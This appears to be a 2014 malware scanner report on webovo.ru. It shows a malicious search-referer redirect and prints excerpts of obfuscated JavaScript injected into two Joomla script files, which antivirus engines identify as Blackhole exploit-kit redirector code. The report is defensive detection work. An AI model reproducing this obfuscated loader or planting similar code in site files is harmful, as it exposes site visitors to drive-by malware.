Malware Scanner report for webovo.ru

Malicious/Suspicious/Total urls checked: 2/0/18

2 pages have malicious code. See details below

Blacklists: OK

Malicious redirects: Found

The website redirects visitors from search engines to the 3rd-party URL:
->http://brg-catalogues.com/mxut.html?h=2848373
52 websites infected.

The website "webovo.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

Request	Server response	Status
URL: http://webovo.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: webovo.ru Referer: http://www.google.com/search?q=redirect+check1	HTTP/1.1 302 Found Connection: close Date: Thu, 25 Sep 2014 10:09:28 GMT Location: http://brg-catalogues.com/mxut.html?h=2848373 Server: nginx Content-Type: text/html; charset=iso-8859-1	malicious

Scanned pages/files

Request	Server response	Status
http://webovo.ru/	200 OK Content-Length: 12746 Content-Type: text/html	clean
http://webovo.ru/media/system/js/caption.js	200 OK Content-Length: 32531 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = ... 3152 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1h(1+1*n[j]));}q=ss;e(q);} Antivirus reports: AntiVir JS/Redirector.PM.10 Avast JS:Crypt-A [Trj] Ad-Aware Trojan.JS.Iframe.BJT Ikarus Trojan.Script Rising JS:Hack.Exploit.Script.JS.IframeRef.a!1610720 nProtect Trojan.JS.Iframe.BJT K7AntiVirus Trojan ( 6e85836f0 ) Comodo TrojWare.JS.Agent.HJ Emsisoft Trojan.JS.Iframe.BJT (B) CAT-QuickHeal JS/BlacoleRef.BA K7GW Exploit ( 04c556d01 ) McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.233 TrendMicro HEUR_HTJS.HDJSFN Microsoft Trojan:JS/Redirector.JN Kaspersky Trojan-Downloader.JS.Agent.gqu MicroWorld-eScan Trojan.JS.Iframe.BJT Fortinet JS/Crypt.CAAD!tr TotalDefense JS/BlacoleRef.M Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Agent.rrcam ClamAV Trojan.Blackhole-483 F-Secure Trojan.JS.Iframe.BJT VIPRE Trojan-Downloader.JS.Agent.gup (v) F-Prot JS/Redir.JX AVG Script/Exploit.Kit Norman Downloader.HIVI Sophos Mal/ScrLd-A GData Trojan.JS.Iframe.BJT Symantec Trojan.Malscript!html Commtouch JS/Redir.JX ESET-NOD32 JS/Agent.NEK BitDefender Trojan.JS.Iframe.BJT
http://webovo.ru/index.php?option=com_banners&task=click&bid=1	HTTP/1.1 303 See other Connection: close Date: Thu, 25 Sep 2014 10:09:30 GMT Location: http://webovo.ru/index.php Server: nginx Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 3761570878738758076547a8fa90229d=34203fbbf35207a7b85e1a076c270ec7; path=/ X-Powered-By: PHP/5.2.17	clean
http://webovo.ru/index.php	200 OK Content-Length: 12746 Content-Type: text/html	clean
http://webovo.ru/index.php?option=com_content&view=article&id=1&Itemid=2	200 OK Content-Length: 18586 Content-Type: text/html	clean
http://webovo.ru/index.php?option=com_content&view=article&id=2&Itemid=3	200 OK Content-Length: 19034 Content-Type: text/html	clean
http://webovo.ru/index.php?option=com_content&view=article&id=3&Itemid=4	200 OK Content-Length: 14876 Content-Type: text/html	clean
http://webovo.ru/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=5	200 OK Content-Length: 11000 Content-Type: text/html	clean
http://webovo.ru/index.php?option=com_content&view=category&layout=blog&id=2&Itemid=6	200 OK Content-Length: 11008 Content-Type: text/html	clean
http://webovo.ru/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=7	200 OK Content-Length: 17815 Content-Type: text/html	clean
http://webovo.ru/index.php?option=com_content&view=category&layout=blog&id=4&Itemid=8	200 OK Content-Length: 10978 Content-Type: text/html	clean
http://webovo.ru/index.php?option=com_content&view=category&layout=blog&id=5&Itemid=9	200 OK Content-Length: 10988 Content-Type: text/html	clean
http://webovo.ru/index.php?option=com_contact&view=contact&id=1&Itemid=10	200 OK Content-Length: 13265 Content-Type: text/html	clean
http://webovo.ru/media/system/js/validate.js	200 OK Content-Length: 22371 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var JFormValidator = new Class({ initialize: function() { this.handlers = Object(); this.custom = Object(); this.setHandler('username', function (value) { regex = new RegExp("[\<\|\>\|\"\|\'\|\%\|\;\|$\|$\|\&]", "i"); return !regex.test(value); } ); this.setHandler('password', function (value) { regex=/^\S[\S ]{2,98}\S$/; return regex.test(value); } ); this.setHandler('numeric ... 3319 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-687!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1h(1+1*n[j]));}q=ss;e(q);} Antivirus reports: AntiVir JS/Dldr.Agent.AX.18 Avast JS:Crypt-A [Trj] Ad-Aware Trojan.JS.Iframe.BJT Ikarus Trojan.Script nProtect Trojan.JS.Iframe.BJT K7AntiVirus Exploit ( 04c556f11 ) TrendMicro-HouseCall JS_BLACOLE.AJO Comodo TrojWare.JS.Agent.HJ Emsisoft Trojan.JS.Iframe.BJT (B) CAT-QuickHeal JS/BlacoleRef.BA K7GW Exploit ( 04c556f11 ) DrWeb JS.IFrame.233 TrendMicro JS_BLACOLE.AJO Microsoft Trojan:JS/Redirector.JN Kaspersky Trojan-Downloader.JS.Agent.gqu MicroWorld-eScan Trojan.JS.Iframe.BJT Tencent Unk.Win32.Script.400114 Fortinet JS/Crypt.CAAD!tr TotalDefense JS/BlacoleRef.M Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Agent.rrcam ClamAV Trojan.Blackhole-483 F-Secure Trojan.JS.Iframe.BJT VIPRE Trojan-Downloader.JS.Agent.gup (v) F-Prot JS/Redir.JX AVG Script/Exploit.Kit Sophos Mal/ScrLd-A GData Trojan.JS.Iframe.BJT Symantec Trojan.Malscript!html Commtouch JS/Redir.JX AVware Trojan-Downloader.JS.Agent.gup (v) ESET-NOD32 JS/Agent.NEK BitDefender Trojan.JS.Iframe.BJT
http://webovo.ru/index.php?option=com_banners&task=click&bid=2	HTTP/1.1 303 See other Connection: close Date: Thu, 25 Sep 2014 10:09:37 GMT Location: http://webovo.ru/index.php Server: nginx Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 3761570878738758076547a8fa90229d=c245d057368ad6e94fcd4540b0302388; path=/ X-Powered-By: PHP/5.2.17	clean
http://webovo.ru/test404page.js	HTTP/1.1 302 Found Connection: close Date: Thu, 25 Sep 2014 10:09:37 GMT Location: http://err.agava.ru/vh/404.html Server: nginx Content-Type: text/html; charset=iso-8859-1	clean
http://err.agava.ru/vh/404.html	200 OK Content-Length: 12338 Content-Type: text/html	clean
http://err.agava.ru/vh/js/main.js	200 OK Content-Length: 34164 Content-Type: application/x-javascript	clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=webovo.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://webovo.ru/

Result: webovo.ru is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for webovo.ru

Malware & Hack Repair

Website Hack Insurance

Malicious/Suspicious Redirects

Scanned pages/files

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools